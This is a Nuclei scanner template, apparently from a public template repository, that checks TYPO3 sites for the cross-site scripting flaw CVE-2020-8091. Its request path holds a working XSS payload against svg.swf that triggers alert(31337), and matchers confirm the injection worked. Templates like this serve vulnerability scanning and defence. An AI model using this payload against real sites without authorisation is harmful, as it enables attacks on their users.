nuclei-templates/cves/CVE-2020-8091.yaml

24 lines
529 B
YAML
Raw Normal View History

id: cve-2020-8091
2020-07-03 17:55:17 +00:00
info:
name: TYPO3 Cross-Site Scripting Vulnerability
author: dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "31337"
part: body
- type: word
words:
- "application/x-shockwave-flash"
part: header